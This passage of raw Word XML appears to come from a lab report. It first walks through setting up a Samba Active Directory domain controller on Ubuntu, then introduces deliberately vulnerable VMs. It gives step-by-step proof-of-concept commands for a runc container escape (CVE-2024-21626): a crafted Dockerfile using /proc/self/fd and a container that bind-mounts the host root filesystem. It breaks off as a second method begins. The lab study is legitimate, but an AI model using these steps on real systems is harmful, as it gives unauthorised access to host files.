          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">               Before we start we should unmask the service and start it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl unmask samba-ad-dc</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">               sudo systemctl start samba-ad-dc</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">               sudo systemctl status samba-ad-dc</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">               sudo systemctl enable samba-ad-dc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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12: List the samba shares and test authentication </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">list samba shares using this command, test authentication with our administrator   </w:t>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 account,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check if samba-ad-dc has configured the required DNS entries.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="72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smbclient -L localhost -N</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> //list samba shares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //localhost/netlogon -UAdministrator -c 'ls'</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//test authentication with our administrator account</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">host -t SRV _ldap._tcp.thesecmaster.com</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//check if samba-ad-dc has configured the required DNS entries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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The command host -t SRV _ldap._tcp.thesecmaster.com is used to query DNS for the Service (SRV) records associated with the LDAP service for the domain thesecmaster.com. SRV records are used to define the location (hostname and port) of servers for specified services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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output of this command typically includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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priority of the service. (0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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weight of the service. (100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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port on which the service is running. (389)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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The hostname of the server providing the service. (dc.pd.com)</w:t>
        <w:br w:type="textWrapp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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kinit administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//request a kerberos ticket</w:t>
      </w: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943600" cy="3119438"/>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klist</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//list</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo samba-tool user list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//check the default users on the Active directory</w:t>
      </w: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934075" cy="3702892"/>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34075" cy="3702892"/>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Adding a User to Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 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Add user </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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo samba-tool user create &lt;username&gt; &lt;password&gt; --given-name="&lt;full_name&gt;"            --surname="User"</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Verify the user creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">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sudo samba-tool user list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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943600" cy="3146502"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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146502"/>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Adding Resources in Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="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Organizational Unit (OU) -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pP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an OU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:spacing w:line="24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sudo samba-tool ou create "OU=&lt;OU_Name&gt;,DC=&lt;domain&gt;,DC=com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:spacing w:line="24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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move Users to an Organizational Unit</w:t>
        <w:br w:type="textWrapping"/>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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo samba-tool user move &lt;username&gt; "OU=&lt;OU_Name&gt;,DC=&lt;domain&gt;,DC=com"</w:t>
      </w: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133">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943600" cy="3024188"/>
            <wp:effectExtent b="0" l="0" r="0" t="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5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Group:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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             Creating a group</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo samba-tool group add &lt;group_name&gt; --description="&lt;group_description&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding users to a group</w:t>
        <w:br w:type="textWrapp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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo samba-tool group addmembers &lt;group_name&gt; &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">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rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2875433"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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2875433"/>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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>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color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Setup Active Directory on Ubuntu: A Quick Guide (thesecmaster.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Introduction to Active Directory integration | Ubuntu</w:t>
        </w:r>
      </w:hyperlink>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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:sectPr>
          <w:footerReference r:id="rId20"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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABLE VIRTUAL MACHINES</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2.1 Introduction to Vulnerable Virtual Machines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Virtual machines (VMs) are intentionally designed environments that contain known security flaws. These VMs are used for educational purposes, allowing cybersecurity professionals, students, and enthusiasts to practice penetration testing, vulnerability assessment, and exploit development in a controlled and legal environment. When focusing specifically on Linux OS vulnerabilities, these VMs replicate real-world scenarios where Linux-based systems are misconfigured or contain software with security weaknesses. </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8"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 POC: Container Escape</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Id: 2024-21626</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attack could be done by a malicious image to allow a container process to gain access to the host filesystem through runc run. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attacks by overwriting semi-arbitrary host binaries, allowing for complete container escapes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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6">
      <w:pPr>
        <w:spacing w:after="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Target VM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276"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Linux distro: Arch Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276"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Linux kernel: 6.9.9-arch1-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276"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Docker version: 24.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276"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runc version: 1.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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C">
      <w:pPr>
        <w:spacing w:after="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Steps for Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:spacing w:after="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Method 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:spacing w:after="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Step 1: Create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">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mkdir m2-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">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cd m2-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pP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52">
      <w:pPr>
        <w:spacing w:after="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Step 2: Create Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">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nano Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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(contents of dockerfile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">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FROM ubuntu:latest </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">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RUN mkdir -p /host-root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">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WORKDIR /proc/self/fd/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">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CMD [“tail”, “-f”, “/dev/null”]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pP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5A">
      <w:pPr>
        <w:spacing w:after="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Step 3: Build the Malicious Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">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docker build -t m2-image .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pP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5D">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b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Run the Container:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker run -d --name ex2-container --mount type=bind,source=/,target=/host-root m2-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pP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5F">
      <w:pPr>
        <w:spacing w:after="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Step 5: Verify the Exploit</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60">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docker exec -it ex2-container sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">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ls /host-root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pP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63">
      <w:pPr>
        <w:spacing w:after="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POC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:spacing w:after="0"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358140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0" w:line="276"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 access the restricted files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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67">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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68">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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69">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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6A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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6B">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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6C">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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6D">
      <w:pP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6E">
      <w:pPr>
        <w:spacing w:after="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Method 2: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:spacing w:after="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Step 1: Create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">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mkdir m1-image</w:t>
      </w:r>
    </w:p>
